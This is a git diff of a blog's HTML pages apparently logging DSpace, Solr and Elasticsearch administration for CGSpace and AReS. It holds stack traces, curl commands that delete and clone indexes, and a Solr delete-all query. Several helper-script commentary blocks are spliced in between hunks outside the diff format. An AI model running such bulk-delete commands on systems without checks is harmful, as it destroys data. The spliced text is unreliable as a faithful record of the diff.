                                                      -        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
                                                      -        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
                                                      -        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
                                                      -        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
                                                      -        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
                                                      -        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
                                                      -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                      -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                      -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                      -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                      -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                      -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                      -
                                                        +
                                                        ...
                                                        +Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
                                                        +Exception: Java heap space
                                                        +java.lang.OutOfMemoryError: Java heap space
                                                        +        at java.util.Arrays.copyOfRange(Arrays.java:3664)
                                                        +        at java.lang.String.<init>(String.java:207)
                                                        +        at org.noggit.CharArr.toString(CharArr.java:164)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
                                                        +        at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
                                                        +        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
                                                        +        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
                                                        +        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
                                                        +        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
                                                        +        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
                                                        +        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
                                                        +        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
                                                        +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                        +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                        +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                        +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                        +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                        +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                        +
                                                        • That was with a JVM heap of 512m
                                                        • I looked in Solr and found dozens of duplicates of each field again…
                                                            @@ -744,30 +744,30 @@ java.lang.OutOfMemoryError: Java heap space
                                                          • The AReS harvest finished this morning and I moved the Elasticsearch index manually
                                                          • First, check the number of records in the temp index to make sure it looks complete and does not contain duplicated data:
                                                          -
                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                          -{
                                                          -  "count" : 100135,
                                                          -  "_shards" : {
                                                          -    "total" : 1,
                                                          -    "successful" : 1,
                                                          -    "skipped" : 0,
                                                          -    "failed" : 0
                                                          -  }
                                                          -}
                                                          -
                                                            +
                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                            +{
                                                            +  "count" : 100135,
                                                            +  "_shards" : {
                                                            +    "total" : 1,
                                                            +    "successful" : 1,
                                                            +    "skipped" : 0,
                                                            +    "failed" : 0
                                                            +  }
                                                            +}
                                                            +
                                                            • Then delete the old backup and clone the current items index as a backup:
                                                            -
                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-14?pretty'
                                                            -$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
                                                            -
                                                              +
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-14?pretty'
                                                              +$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
                                                              +
                                                              • Then delete the current items index and clone it from temp:
                                                              -
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                              -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                              -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                              -

                                                              2020-12-22

                                                              +
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                              +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                              +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                              +

                                                              2020-12-22

                                                              • I finished getting the Swagger UI integrated into the dspace-statistics-api
                                                                  @@ -810,10 +810,10 @@ $ curl -X PUT "localhost:9200/openrxv-items-temp
                                                    • I exported the 2012 stats from the year core and imported them to the main statistics core with solr-import-export-json:
                                                    -
                                                    $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
                                                    -$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2012.json -k uid
                                                    -$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
                                                    -
                                                      +
                                                      $ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
                                                      +$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2012.json -k uid
                                                      +$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
                                                      +
                                                      • I decided to do the same for the remaining 2011, 2014, 2017, and 2019 cores…

                                                      2020-12-29

                                                      @@ -824,31 +824,31 @@ $ curl -s "http://localhost:8081/solr/statistics
                                                  -
                                                  $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                                  -{
                                                  -  "count" : 100135,
                                                  -  "_shards" : {
                                                  -    "total" : 1,
                                                  -    "successful" : 1,
                                                  -    "skipped" : 0,
                                                  -    "failed" : 0
                                                  -  }
                                                  -}
                                                  -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  -$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
                                                  -$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  -

                                                  2020-12-30

                                                  +
                                                  $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                                  +{
                                                  +  "count" : 100135,
                                                  +  "_shards" : {
                                                  +    "total" : 1,
                                                  +    "successful" : 1,
                                                  +    "skipped" : 0,
                                                  +    "failed" : 0
                                                  +  }
                                                  +}
                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  +$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
                                                  +$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  +

                                                  2020-12-30

                                                  • The indexing on AReS finished so I cloned the openrxv-items-temp index to openrxv-items and deleted the backup index:
                                                  -
                                                  $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                  -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-29?pretty'
                                                  -
                                                  +
                                                  $ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                                  +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                  +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                  +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-29?pretty'
                                                  +
                                                  diff --git a/docs/2021-01/index.html b/docs/2021-01/index.html index af3f387ff..695184a5f 100644 --- a/docs/2021-01/index.html +++ b/docs/2021-01/index.html @@ -50,7 +50,7 @@ For example, this item has 51 views on CGSpace, but 0 on AReS "/> - + @@ -160,29 +160,29 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
                                              -
                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                              -# start indexing in AReS
                                              -
                                                +
                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                +# start indexing in AReS
                                                +
                                                • Then, the next morning when it’s done, check the results of the harvesting, back up the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
                                                -
                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                -{
                                                -  "count" : 100278,
                                                -  "_shards" : {
                                                -    "total" : 1,
                                                -    "successful" : 1,
                                                -    "skipped" : 0,
                                                -    "failed" : 0
                                                -  }
                                                -}
                                                -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-04'
                                                -

                                                2021-01-04

                                                +
                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                +{
                                                +  "count" : 100278,
                                                +  "_shards" : {
                                                +    "total" : 1,
                                                +    "successful" : 1,
                                                +    "skipped" : 0,
                                                +    "failed" : 0
                                                +  }
                                                +}
                                                +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-04
                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-04'
                                                +
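
The backup-and-swap sequence above recurs on every harvest, so it can be sketched as a small set of shell functions. This is only a sketch: `ES_URL`, `RUN`, and all function names are made up for illustration and are not part of AReS or OpenRXV. By default it only prints the `curl` calls (without their original quoting); setting `RUN=1` executes them.

```shell
#!/usr/bin/env bash
# Sketch only: ES_URL, RUN, and the function names are illustrative assumptions.
ES_URL="${ES_URL:-http://localhost:9200}"

# Print the command; execute it only when RUN=1.
run() {
    printf '%s\n' "$*"
    if [ "${RUN:-0}" = "1" ]; then
        "$@"
    fi
}

# Block writes on an index (Elasticsearch requires a read-only source for _clone).
block_writes() {
    run curl -s -X PUT "$ES_URL/$1/_settings" \
        -H 'Content-Type: application/json' \
        -d '{"settings": {"index.blocks.write": true}}'
}

# Clone index $1 to a new index $2.
clone_index() {
    block_writes "$1"
    run curl -s -X POST "$ES_URL/$1/_clone/$2"
}

delete_index() {
    run curl -s -X DELETE "$ES_URL/$1"
}

# Back up the live index, replace it with the temp index, then clean up.
# $1 is a suffix for the backup index name, for example a date.
swap_temp_into_place() {
    local backup="openrxv-items-$1"
    clone_index openrxv-items "$backup"
    delete_index openrxv-items
    clone_index openrxv-items-temp openrxv-items
    delete_index openrxv-items-temp
    delete_index "$backup"
}
```

Running `swap_temp_into_place 2021-01-04` prints the same seven requests as the manual session, in the same order. In practice it may be safer to keep the backup index until the new `openrxv-items` has been checked.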

                                                2021-01-04

                                                • There is one item that appears twice in AReS: 10568/66839
                                                    @@ -214,8 +214,8 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                -
                                                $ ./doi-to-handle.py -db dspace -u dspace -p 'fuuu' -i /tmp/dois.txt -o /tmp/out.csv
                                                -
                                                  +
                                                  $ ./doi-to-handle.py -db dspace -u dspace -p 'fuuu' -i /tmp/dois.txt -o /tmp/out.csv
                                                  +
                                                  • Help Udana export IWMI records from AReS
                                                    • He wanted me to give him CSV export permissions on CGSpace, but I told him that this requires super admin privileges, so I’m not comfortable with it
                                                    • @@ -261,28 +261,28 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                  -
                                                  2021-01-10 10:03:27,692 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID="TX35636856957739531161091194485578658698")
                                                  -
                                                    +
                                                    2021-01-10 10:03:27,692 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=1e8fb96c-b994-4fe2-8f0c-0a98ab138be0, ObjectType=(Unknown), ObjectID=null, TimeStamp=1610269383279, dispatcher=1544803905, detail=[null], transactionID="TX35636856957739531161091194485578658698")
                                                    +
                                                    • I filed a bug on Atmire’s issue tracker
                                                    • Peter asked me to move the CGIAR Gender Platform community to the top level of CGSpace, but I get an error when I use the community-filiator command:
                                                    -
                                                    $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                    -Loading @mire database changes for module MQM
                                                    -Changes have been processed
                                                    -Exception: null
                                                    -java.lang.UnsupportedOperationException
                                                    -        at java.util.AbstractList.remove(AbstractList.java:161)
                                                    -        at java.util.AbstractList$Itr.remove(AbstractList.java:374)
                                                    -        at java.util.AbstractCollection.remove(AbstractCollection.java:293)
                                                    -        at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
                                                    -        at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
                                                    -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                    -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                    -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                    -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                    -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                    -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                    -
                                                      +
                                                      $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                      +Loading @mire database changes for module MQM
                                                      +Changes have been processed
                                                      +Exception: null
                                                      +java.lang.UnsupportedOperationException
                                                      +        at java.util.AbstractList.remove(AbstractList.java:161)
                                                      +        at java.util.AbstractList$Itr.remove(AbstractList.java:374)
                                                      +        at java.util.AbstractCollection.remove(AbstractCollection.java:293)
                                                      +        at org.dspace.administer.CommunityFiliator.defiliate(CommunityFiliator.java:264)
                                                      +        at org.dspace.administer.CommunityFiliator.main(CommunityFiliator.java:164)
                                                      +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                      +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                      +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                      +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                      +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                      +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                      +
                                                      • There is apparently a bug in DSpace 6.x that makes community-filiator not work
                                                        • There is a patch for the as-yet-unreleased DSpace 6.4, so I will try that
                                                        • @@ -301,24 +301,24 @@ java.lang.UnsupportedOperationException
                                                      -
                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                      -# start indexing in AReS
                                                      -... after ten hours
                                                      -$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                      -{
                                                      -  "count" : 100411,
                                                      -  "_shards" : {
                                                      -    "total" : 1,
                                                      -    "successful" : 1,
                                                      -    "skipped" : 0,
                                                      -    "failed" : 0
                                                      -  }
                                                      -}
                                                      -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                      -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                      -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                      -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                      -
                                                        +
                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                        +# start indexing in AReS
                                                        +... after ten hours
                                                        +$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                        +{
                                                        +  "count" : 100411,
                                                        +  "_shards" : {
                                                        +    "total" : 1,
                                                        +    "successful" : 1,
                                                        +    "skipped" : 0,
                                                        +    "failed" : 0
                                                        +  }
                                                        +}
                                                        +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                        +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                        +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                        +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                        +
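
Before deleting the live index it can help to check the harvested count automatically rather than by eye. The sketch below pulls the `count` value out of a `_count` response using only `sed`. The function names and the minimum count in the usage note are illustrative assumptions, not something AReS provides.

```shell
#!/usr/bin/env bash
# Sketch only: function names are illustrative.

# Read an Elasticsearch _count response on stdin and print the "count" value.
count_from_json() {
    sed -n 's/.*"count"[[:space:]]*:[[:space:]]*\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# Succeed only when count $1 is at least the caller-chosen minimum $2.
count_is_at_least() {
    [ "$1" -ge "$2" ]
}
```

For example, `count=$(curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*' | count_from_json)` followed by `count_is_at_least "$count" 100000 || echo "harvest looks incomplete"`, where 100000 is a hypothetical floor chosen from the previous harvests.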
                                                        • Looking over the last month of Solr stats I see a familiar bot that should have been marked as a bot months ago:
                                                        @@ -331,9 +331,9 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                    -
                                                    $ cat log/dspace.log.2020-12-2* | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71' | sort | uniq | wc -l
                                                    -0
                                                    -
                                                      +
                                                      $ cat log/dspace.log.2020-12-2* | grep -E 'session_id=[A-Z0-9]{32}:ip_addr=64.62.202.71' | sort | uniq | wc -l
                                                      +0
                                                      +
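
The pipeline above de-duplicates whole log lines, and the dots in the IP address match any character. A variant that counts distinct session IDs for one IP could look like the sketch below. The function name is hypothetical, and the log layout (`session_id=…:ip_addr=…`) is assumed from the pattern used above.

```shell
#!/usr/bin/env bash
# Sketch only: unique_sessions_for_ip is an illustrative name.

# Read DSpace log lines on stdin and print the number of distinct
# session_id/ip_addr pairs for the IP address given as $1.
unique_sessions_for_ip() {
    local ip_re
    # Escape the dots so they match literally in the extended regex.
    ip_re="$(printf '%s' "$1" | sed 's/\./\\./g')"
    grep -E -o "session_id=[A-Z0-9]{32}:ip_addr=${ip_re}" | sort -u | wc -l | tr -d ' '
}
```

Usage would be `cat log/dspace.log.2020-12-2* | unique_sessions_for_ip 64.62.202.71`.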
                                                      • So now I should really add it to the DSpace spider agent list so it doesn’t create Solr hits
                                                        • I added it to the “ilri” lists of spider agent patterns
                                                        • @@ -341,8 +341,8 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                        • I purged the existing hits using my check-spider-ip-hits.sh script:
                                                        -
                                                        $ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
                                                        -

                                                        2021-01-11

                                                        +
                                                        $ ./check-spider-ip-hits.sh -d -f /tmp/ips -s http://localhost:8081/solr -s statistics -p
                                                        +

                                                        2021-01-11

                                                        • The AReS indexing finished this morning and I moved the openrxv-items-temp index to openrxv-items (see above)
                                                            @@ -351,8 +351,8 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                          • I deployed the community-filiator fix on CGSpace and moved the Gender Platform community to the top level of CGSpace:
                                                          -
                                                          $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                          -

                                                          2021-01-12

                                                          +
                                                          $ dspace community-filiator --remove --parent=10568/66598 --child=10568/106605
                                                          +

                                                          2021-01-12

                                                          • IWMI is really pressuring us to have a periodic CSV export of their community
                                                              @@ -393,29 +393,29 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                          -
                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                          -# start indexing in AReS
                                                          -
                                                            +
                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            +# start indexing in AReS
                                                            +
                                                            • Then, the next morning when it’s done, check the results of the harvesting, back up the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
                                                            -
                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                            -{
                                                            -  "count" : 100540,
                                                            -  "_shards" : {
                                                            -    "total" : 1,
                                                            -    "successful" : 1,
                                                            -    "skipped" : 0,
                                                            -    "failed" : 0
                                                            -  }
                                                            -}
                                                            -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                            -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-18'
                                                            -

                                                            2021-01-18

                                                            +
                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                            +{
                                                            +  "count" : 100540,
                                                            +  "_shards" : {
                                                            +    "total" : 1,
                                                            +    "successful" : 1,
                                                            +    "skipped" : 0,
                                                            +    "failed" : 0
                                                            +  }
                                                            +}
                                                            +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-18
                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                            +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-18'
                                                            +

                                                            2021-01-18

                                                            • Finish the indexing on AReS that I started yesterday
                                                            • Udana from IWMI emailed me to ask why the iwmi.csv doesn’t include items he approved to CGSpace this morning @@ -462,9 +462,9 @@ localhost/dspace63= > COMMIT;
                                                          -
                                                          $ docker exec -it api /bin/bash
                                                          -# apt update && apt install unoconv
                                                          -
                                                            +
                                                            $ docker exec -it api /bin/bash
                                                            +# apt update && apt install unoconv
                                                            +
                                                            • Help Peter get a list of titles and DOIs for CGSpace items that Altmetric does not have an attention score for
                                                              • He generated a list from their dashboard and I extracted the DOIs in OpenRefine (because it was WINDOWS-1252 and csvcut couldn’t do it)
                                                              • @@ -512,30 +512,30 @@ localhost/dspace63= > COMMIT;
                                                            -
                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                            -# start indexing in AReS
                                                            -
                                                              +
                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                              +# start indexing in AReS
                                                              +
                                                              • Then, the next morning when it’s done, check the results of the harvesting, back up the current openrxv-items index, and clone the openrxv-items-temp index to openrxv-items:
                                                              -
                                                              $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                              -{
                                                              -  "count" : 100699,
                                                              -  "_shards" : {
                                                              -    "total" : 1,
                                                              -    "successful" : 1,
                                                              -    "skipped" : 0,
                                                              -    "failed" : 0
                                                              -  }
                                                              -}
                                                              -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.b
                                                              -locks.write":true}}'
                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                              -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                              -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-25'
                                                              -
                                                                +
                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                +{
                                                                +  "count" : 100699,
                                                                +  "_shards" : {
                                                                +    "total" : 1,
                                                                +    "successful" : 1,
                                                                +    "skipped" : 0,
